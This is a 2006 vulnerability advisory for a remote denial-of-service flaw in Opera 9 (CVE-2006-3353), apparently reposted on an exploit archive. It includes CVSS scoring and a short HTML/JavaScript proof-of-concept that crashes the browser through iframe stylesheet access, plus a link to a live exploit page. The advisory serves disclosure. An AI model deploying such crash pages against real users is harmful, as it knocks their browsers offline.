OPERA Web Browser 9 Denial OF Service

2006.07.06
Credit: y3dips echo or id
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2006-3353
CWE: CWE-Other


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

ECHO_ADV_35$2006 ------------------------------------------------------------------------ ------------ [ECHO_ADV_35$2006] OPERA Web Browser 9 Denial OF Service ------------------------------------------------------------------------ ------------ Author : Ahmad Muammar W.K (a.k.a) y3dips Date Found : July, 1th 2006 Location : Indonesia, Jakarta web : http://echo.or.id/adv/adv35-y3dips-2006.txt Critical Lvl : Moderated Impact : Browser will automatically shutdown Where : From Remote ------------------------------------------------------------------------ ------------ Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Opera Web Browser Application : Opera Web Browser version : Opera/9.00 (X11; Linux i686; U; en) Opera/9.00 (Windows NT 5:1;U;en) Some Other version are bot vulnerable and others are not tested, URL : http://opera.com Description : Vulnerability can be exploited by using <iframe> combining with javascript (documents stylesheet) to create an out-of-bounds memory access. ------------------------------------------------------------------------ ------------ Exploit Code: ~~~~~~~~~~~~~~~~ -----------------------opera9xploit.html---------------------- <!-- Opera 9 DOS exploit, discovered by Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id) http://y3d1ps.blogspot.com //--> <html> <iframe src="palsu.php" name="fake" ></iframe> <script type="text/javascript"> function mystyle() { if (fake.document.styleSheets.length == 1 ) { f = document.forms["basicstyle"].elements; for (j = 0; j < f.length; j++) { if (f[j].name == 'fsmain'); } } } mystyle(); </script> </html> live exploit : http://y3dips.echo.or.id/opera9-dos/ ------------------------------------------------------------------------ ------------ Solution: ~~~~~~~~ Disable Java Scipt execution from Opera Web browser ------------------------------------------------------------------------ ------------ Shoutz: ~~~~~~~ ~ my beloved ana ~ the_day, K-159 (keep researching), also all echo staff ~ negative , naisenodni crew ~ janex vind "waraxe" @ waraxe.us ~ newbie_hacker[at]yahoogroups.com ~ #e-c-h-o @irc.dal.net ------------------------------------------------------------------------ ------------ Contact: ~~~~~~~~ y3dips || echo|staff || y3dips[at]echo[dot]or[dot]id Homepage: http://y3dips.echo.or.id/ -------------------------------- [ EOF ] -------------------------------------------


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top